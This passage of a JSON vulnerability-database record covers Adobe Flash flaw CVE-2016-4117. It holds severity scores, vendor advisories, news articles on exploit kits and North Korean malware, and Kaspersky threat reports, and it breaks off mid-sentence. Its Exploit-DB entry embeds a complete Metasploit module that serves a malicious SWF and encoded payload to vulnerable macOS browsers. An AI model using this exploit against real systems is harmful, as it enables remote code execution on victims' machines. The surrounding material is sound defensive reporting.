\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-4117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2021-07-27T00:00:00", "id": "AKB:2D60486C-E757-4423-BC79-7E5CE137970D", "href": "https://attackerkb.com/topics/2MuHomkZ0P/cve-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:46:56", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to\nexecute arbitrary code via unspecified vectors, as exploited in the wild in\nMay 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-05-11T00:00:00", "id": "UB:CVE-2016-4117", "href": "https://ubuntu.com/security/CVE-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2021-06-24T23:45:08", "description": "Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.\n", "cvss3": {}, "published": "2016-05-11T09:18:12", "type": "redhatcve", "title": "CVE-2016-4117", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2021-05-28T01:20:14", "id": "RH:CVE-2016-4117", "href": "https://access.redhat.com/security/cve/cve-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:20", "description": "An out of bounds access vulnerability has been reported in Adobe Flash Player. The vulnerability is due to a type-confused parameter in Adobe Flash Player SWF file. A remote attacker can exploit this issue by using the out of bounds access for unintended reads, writes or frees \u2013 potentially leading to code corruption, control-flow hijack, or information leak attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "checkpoint_advisories", "title": "Adobe Flash Out of Bounds Access Code Corruption (CVE-2016-4117)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-03-18T00:00:00", "id": "CPAI-2016-0350", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-01-13T05:33:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-11T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117", "2016-4117"], "modified": "2019-02-11T00:00:00", "id": "EDB-ID:46339", "href": "https://www.exploit-db.com/exploits/46339", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\r\n 'Description' => %q(\r\n This module exploits a type confusion on Adobe Flash Player, which was\r\n originally found being successfully exploited in the wild. This module\r\n has been tested successfully on:\r\n macOS Sierra 10.12.3,\r\n Safari and Adobe Flash Player 21.0.0.182,\r\n Firefox and Adobe Flash Player 21.0.0.182.\r\n ),\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\r\n 'bcook-r7' # Imported Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2016-4117'],\r\n ['BID', '90505'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\r\n ['URL', 'http://www.securitytracker.com/id/1035826'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['osx'],\r\n 'BrowserRequirements' =>\r\n {\r\n source: /script|headers/i,\r\n os_name: lambda do |os|\r\n os =~ OperatingSystems::Match::MAC_OSX\r\n end,\r\n ua_name: lambda do |ua|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if ua == Msf::HttpClients::SAFARI\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n\r\n false\r\n end,\r\n flash: lambda do |ver|\r\n case target.name\r\n when 'Mac OS X'\r\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\r\n end\r\n\r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [\r\n 'Mac OS X', {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X64\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 27 2016',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri.end_with? 'swf'\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n\r\n if target.name.include? 'osx'\r\n platform_id = 'osx'\r\n end\r\n html_template = %(<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n )\r\n\r\n return html_template, binding\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\r\n File.binread(path)\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46339", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-LcT8O23njws/WEe8BvRhm_I/AAAAAAAAqeA/D8GOfD7oCSMDAcImuqa7_-oueUq-qym5wCLcB/s1600/stegano-exploit-kit-malware-hacking.png>)\n\nIf you have visited any popular mainstream website over the past two months, your computer may have been infected \u2014 Thanks to a new exploit kit discovered by security researchers. \n \nResearchers from antivirus provider ESET released a [report](<http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/>) on Tuesday stating that they have discovered an exploit kit, dubbed **Stegano**, hiding malicious code in the pixels of banner advertisements that are currently in rotation on several high profile news websites. \n \nStegano originally dates back to 2014, but since early October this year, cyber crooks had managed to get the malicious ads displayed on a variety of unnamed reputable news websites, each with Millions of daily visitors. \n \nStegano derived from the word **[Steganography](<https://thehackernews.com/2015/06/Stegosploit-malware.html>)**, which is a technique of hiding messages and content inside a digital graphic image, making the content impossible to spot with the naked eye. \n \nIn this particular malvertising campaign, operators hide malicious code inside transparent PNG image's Alpha Channel, which defines the transparency of each pixel, by altering the transparency value of several pixels. \n \nThe malvertising campaign operators then packed the altered image as an advertisement and managed to display those malicious ads on several high-profile websites. \n \nAccording to the researchers, the malicious ads promote applications called \"Browser Defense\" and \"Broxu,\" and the methodology makes it tough for ad networks to detect. \n \n\n\n### Here's How the Stegano Attack Works:\n\n \nOnce a user visits a site hosting malicious advertisement, the malicious script embedded in the ad reports information about the victim's computer to the attacker's remote server without any user interaction. \n \nThe malicious code then uses the CVE-2016-0162 vulnerability in Microsoft's Internet Explorer (IE) browser in order to scan the target computer to see if it is running on a malware analyst's machine. \n \nAfter verifying the targeted browser, the malicious script redirects the browser to a website that hosts Flash Player exploits for three now-patched Adobe Flash vulnerabilities: CVE-2015-8651, CVE-2016-1019, and CVE-2016-4117. \n\n\n> \"Upon successful exploitation, the executed shell code collects information on installed security products and performs \u2013 as paranoid as the cybercriminals behind this attack \u2013 yet another check to verify that it is not being monitored,\" ESET researchers wrote in a blog post. \"If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.\"\n\nWhen downloaded to the victim's computer, the encrypted payload is then decrypted and launched via regsvr32.exe or rundll32.exe in Microsoft Windows. \n \n\n\n### Just Visit a Site, and You'll be Hacked in Just 2-3 Sec\n\n \nBelow is an ESET infographic that explains the working of Stegano's exploit attack: \n\n\n[](<https://2.bp.blogspot.com/-X5Wqj0LvCm4/WEfDwXzrj9I/AAAAAAAAqeQ/zo2BY0Bq_yE9IiBqIa-fkNdLmnHPtX9WgCLcB/s1600/exploit-kit-working.png>)\n\n \nAll the above operations execute automatically without any user interactions and takes place in the span of just 2-3 seconds. \n \nSo far, the Stegano exploit kit has pushed various trojan downloaders, the Ursnif and Ramnit banking trojans, backdoors, spyware, and file stealers. \n \nThe Stegano exploit kit was initially used in 2014 to target people in the Netherlands, and then in 2015, moved on to residents in the Czech Republic. The latest attack campaign is targeting people in Canada, the UK, Australia, Spain, and Italy. \n \nThe best way to protect yourself against any malvertising campaign is always to make sure you are running updated software and apps. Also use reputed antivirus software that can detect such threats before they infect your system.\n", "cvss3": {}, "published": "2016-12-06T21:08:00", "type": "thn", "title": "Hacking Millions with Just an Image \u2014 Recipe: Pixels, Ads & Exploit Kit ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0162", "CVE-2016-1019", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-12-07T08:09:54", "id": "THN:BF8375E3582DA11921BF468B0D3C4F03", "href": "https://thehackernews.com/2016/12/image-exploit-hacking.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:00", "description": "[](<https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png>)\n\nThe United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation. \n \nThe [joint report](<https://www.us-cert.gov/ncas/alerts/TA17-164A>) from the FBI and U.S. Department of Homeland Security (DHS) provided details on \"**DeltaCharlie**,\" a malware variant used by \"**Hidden Cobra**\" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network. \n \nAccording to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure. \n \nWhile the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace \u2013 the one allegedly [linked to the devastating WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>) menace that shut down hospitals and businesses worldwide. \n \n\n\n### DeltaCharlie \u2013 DDoS Botnet Malware\n\n \nThe agencies identified [IP addresses](<https://www.us-cert.gov/sites/default/files/publications/TA-17-164A_csv.csv>) with \"high confidence\" associated with \"DeltaCharlie\" \u2013 a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. \n \nDeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including [Domain Name System](<https://thehackernews.com/2014/06/dns-flood-ddos-attack-hit-video-gaming.html>) (DNS) attacks, [Network Time Protocol](<https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html>) (NTP) attacks, and Character Generation Protocol (CGP) attacks. \n \nThe botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks. \n \nHowever, the DeltaCharlie DDoS malware is not new. \n \nDeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [[PDF](<https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf>)], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo. \n \nOther malware used by Hidden Cobra include [Destover](<https://securelist.com/destover/67985/>), Wild Positron or [Duuzer](<https://www.symantec.com/connect/blogs/duuzer-back-door-trojan-targets-south-korea-take-over-computers>), and [Hangman](<http://telussecuritylabs.com/threats/show/TSL20150910-04>) with sophisticated capabilities, including [DDoS botnets](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>), keyloggers, remote access tools (RATs), and [wiper malware](<https://thehackernews.com/2013/03/south-korea-cyber-attack-wiper-malware.html>). \n \n\n\n### Hidden Cobra's Favorite Vulnerabilities\n\n \nOperating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into victim's machine. \n \nThese are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra: \n\n\n * Hangul Word Processor bug (CVE-2015-6585)\n * Microsoft Silverlight flaw ([CVE-2015-8651](<https://thehackernews.com/2015/12/adobe-flash-security-update.html>))\n * Adobe Flash Player 18.0.0.324 and 19.x vulnerability (CVE-2016-0034)\n * Adobe Flash Player 21.0.0.197 Vulnerability ([CVE-2016-1019](<https://thehackernews.com/2016/04/adobe-flash-update.html>))\n * Adobe Flash Player 21.0.0.226 Vulnerability ([CVE-2016-4117](<https://thehackernews.com/2016/12/image-exploit-hacking.html>))\nThe simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall. \n \nSince Adobe Flash Player is prone to many attacks and just today the company [patched nine vulnerability in Player](<https://thehackernews.com/2017/06/security-patch-tuesday.html>), you are advised to update or remove it completely from your computer. \n \nThe FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group. \n\n\n> \"If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,\" the alert reads.\n\nBesides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow [here](<https://www.us-cert.gov/ncas/alerts/TA17-164A>).\n", "cvss3": {}, "published": "2017-06-14T01:23:00", "type": "thn", "title": "US Warns of 'DeltaCharlie' \u2013 A North Korean DDoS Botnet Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-6585", "CVE-2016-1019", "CVE-2016-0034", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-06-14T12:23:04", "id": "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "href": "https://thehackernews.com/2017/06/north-korea-hacking-malware.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-07-10T10:32:20", "description": "\n\nIn the second quarter of 2017, Kaspersky Lab's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.\n\nThese summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.\n\nIn terms of well-known groups, **Asian actors** were the most active by far.\n\nLazarus/BlueNoroff [was suspected](<https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/>) of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a [campaign against an online casino](<https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/>) in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a [warning](<https://www.us-cert.gov/ncas/analysis-reports/AR18-165A>) in June about a new version of Manuscrypt they call TYPEFRAME.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154452/180709-APT-Trends-report-Q2-2018-1.png>)\n\n_US-CERT alert on Manuscrypt/TYPEFRAME malware used by Lazarus_\n\nEven if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.\n\nPossibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft [was found](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group's capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day [announced](<http://blogs.360.cn/blog/cve-2018-8174-en/>) by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>).\n\nThe overlaps between Scarcruft and Darkhotel go back to 2016 when we [discovered](<https://securelist.com/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/75082/>) Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:\n\nOperation | Exploit | Actor \n---|---|--- \nDaybreak | CVE-2016-4171 | DarkHotel \nErebus | CVE-2016-4117 | Scarcruft \n \nDarkHotel's Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft's Operation Erebus focused primarily on South Korea.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154503/180709-APT-Trends-report-Q2-2018-2.png>)\n\nAnalysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker [was using URLMoniker](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) to invoke Internet Explorer through Microsoft Word, ignoring any default browser preferences on the victim's computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: \"[The King is Dead. Long Live the King!](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>)\".\n\nWe also observed some relatively quiet groups coming back with new activity. A noteworthy example is [LuckyMouse](<https://securelist.com/luckymouse-hits-national-data-center/86083/>) (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.\n\nStill, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an [analysis](<https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/>) on the EXIF to C2 mechanism used by this malware.\n\nThis campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.\n\n## **Activity of well-known groups**\n\nIt seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.\n\nThere is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we [observed](<https://securelist.com/olympic-destroyer-is-still-alive/86169/>) new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/07/09154509/180709-APT-Trends-report-Q2-2018-3.png>)\n\nBut even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.\n\nOne of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.\n\n## **Newcomers and comebacks**\n\nEvery now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.\n\nOne good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.\n\nFollowing the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.\n\nWe also discovered a new low-sophistication set of activity we call Perfanly, which we couldn\u00b4t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.\n\nBetween June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.\n\n## **Final thoughts**\n\nThe combination of simple custom artefacts designed mainly to evade detection, with publicly available tools for later stages seems to be a well-established trend for certain sets of activity, like the ones found under the 'Chinese-speaking umbrella', as well as for many newcomers who find the entry barrier into APT cyberespionage activity non-existent.\n\nThe intermittent activity by many actors simply indicates they were never out of business. They might take small breaks to reorganize themselves, or to perform small operations that might go undetected on a global scale. Probably one of the most interesting cases is LuckyMouse, with aggressive new activity heavily related to the geopolitical agenda in Asia. It is impossible to know if there is any coordination with other actors who resurfaced in the region, but this is a possibility.\n\nOne interesting aspect is the high level of activity by Chinese-speaking actors against Mongolian entities over the last 10 months. This might be related to several summits between Asian countries \u2013 some related to new relations with North Korea \u2013 held in Mongolia, and to the country's new role in the region.\n\nThere were also several alerts from NCSC and US CERT regarding Energetic Bear/Crouching Yeti activity. Even if it is not very clear how active this actor might be at the moment (the alerts basically warned about past incidents), it should be considered a dangerous, active and pragmatic actor very focused on certain industries. We recommend checking [our latest analysis](<https://securelist.com/energetic-bear-crouching-yeti/85345/>) on Securelist because the way this actor uses hacked infrastructure can create a lot of collateral victims.\n\nTo recap, we would like to emphasize just how important networking hardware has become for advanced attackers. We have seen various examples during recent months and VPNFilter should be a wake-up call for those who didn't believe this was an important issue.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at intelreports@kasperksy.com.", "cvss3": {}, "published": "2018-07-10T10:00:22", "type": "securelist", "title": "APT Trends Report Q2 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-4117", "CVE-2016-4171", "CVE-2018-4878", "CVE-2018-8174"], "modified": "2018-07-10T10:00:22", "id": "SECURELIST:F05B277B9FBC7AA810A2092CB58DEF37", "href": "https://securelist.com/apt-trends-report-q2-2018/86487/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-16T15:16:55", "description": "\n\nMore information about BlackOasis APT is available to customers of Kaspersky Intelligence Reporting Service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n## Introduction\n\nKaspersky Lab has always worked closely with vendors to protect users. As soon as we find new vulnerabilities we immediately inform the vendor in a responsible manner and provide all the details required for a fix.\n\nOn October 10, 2017, Kaspersky Lab's advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers. The exploit was delivered through a Microsoft Office document and the final payload was 